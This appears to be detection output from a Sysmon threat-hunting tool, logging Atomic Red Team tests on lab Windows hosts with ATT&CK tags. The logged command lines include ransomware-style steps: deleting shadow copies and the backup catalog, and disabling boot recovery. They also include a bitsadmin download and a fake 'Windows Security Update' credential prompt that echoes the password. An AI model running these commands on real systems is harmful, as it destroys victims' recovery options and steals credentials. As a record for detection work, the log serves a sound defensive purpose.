+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547710.640915,2019-07-19T18:48:30.640915+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3656 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:05.349 + 747F3D96-D825-5D31-0000-0010CF222C00 + 5808 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966541 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:22:28.806 + 365ABB72-5D94-5C91-0000-001080E90F00 + 3840 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb + C:\Windows\AppPatch\Custom\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-543D-5C91-0000-001099A60300 + 2984 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547684.13141,2019-07-19T18:48:04.131410+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3654 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:04.094 + 747F3D96-D824-5D31-0000-001023F42B00 + 6736 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547684.103366,2019-07-19T18:48:04.103366+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3653 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:57.265 + 747F3D96-D81D-5D31-0000-0010D7CD2B00 + 7080 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547677.274199,2019-07-19T18:47:57.274199+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sdelete.exe C:\some\file.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3652 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:57.189 + 747F3D96-D81D-5D31-0000-0010B8CA2B00 + 1632 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sdelete.exe C:\some\file.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547677.227966,2019-07-19T18:47:57.227966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3651 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:51.972 + 747F3D96-D817-5D31-0000-0010C8BA2B00 + 7040 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547672.010791,2019-07-19T18:47:52.010791+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3649 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:51.899 + 747F3D96-D817-5D31-0000-001049B42B00 + 6216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547671.865963,2019-07-19T18:47:51.865963+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3647 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:51.784 + 747F3D96-D817-5D31-0000-001064AD2B00 + 6508 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547666.302556,2019-07-19T18:47:46.302556+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3645 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:46.104 + 747F3D96-D812-5D31-0000-0010AC892B00 + 2948 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553037538.288766,2019-03-20T03:18:58.288766+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966704 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 23:18:42.516 + 365ABB72-78D2-5C91-0000-0010D8A50200 + 2572 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" + C:\Windows\system32\ + EXAMPLE\user01 + 365ABB72-77C4-5C91-0000-0020AD7D0100 + 0x17dad + 1 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-785E-5C91-0000-00103FEA0100 + 1928 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547665.624944,2019-07-19T18:47:45.624944+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wbadmin.exe delete catalog -quiet" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3641 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:45.569 + 747F3D96-D811-5D31-0000-001000632B00 + 4500 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wbadmin.exe delete catalog -quiet" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547665.585327,2019-07-19T18:47:45.585327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3640 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:40.849 + 747F3D96-D80C-5D31-0000-001005542B00 + 1348 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547660.70604,2019-07-19T18:47:40.706040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3638 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:40.568 + 747F3D96-D80C-5D31-0000-0010223C2B00 + 6896 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547660.691438,2019-07-19T18:47:40.691438+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3637 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:37.170 + 747F3D96-D809-5D31-0000-001072292B00 + 980 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547657.127263,2019-07-19T18:47:37.127263+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3633 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:37.083 + 747F3D96-D809-5D31-0000-00100A242B00 + 3968 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,PromptForCredential,powershell,PromptForCredential) in event with Command Line (powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}") in directory : ( C:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3631 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:46:51.935 + 747F3D96-D7DB-5D31-0000-0010B5A82A00 + 4452 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-D7DB-5D31-0000-001089A52A00 + 4256 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3631 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:46:51.935 + 747F3D96-D7DB-5D31-0000-0010B5A82A00 + 4452 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-D7DB-5D31-0000-001089A52A00 + 4256 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547611.957887,2019-07-19T18:46:51.957887+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3630 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:46:51.871 + 747F3D96-D7DB-5D31-0000-001089A52A00 + 4256 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563547579.443587,2019-07-19T18:46:19.443587+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3617 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:46:19.023 + 747F3D96-D7BB-5D31-0000-0010E7FE2900 + 2056 + C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe + 4.7.3190.0 built by: NET472REL1LAST_C + Visual C# Command Line Compiler + Microsoft® .NET Framework + Microsoft Corporation + "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547579.052666,2019-07-19T18:46:19.052666+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3616 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:56.040 + 747F3D96-D7A4-5D31-0000-001020C62900 + 4080 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.743506,2019-07-19T18:49:32.743506+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3695 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.710 + 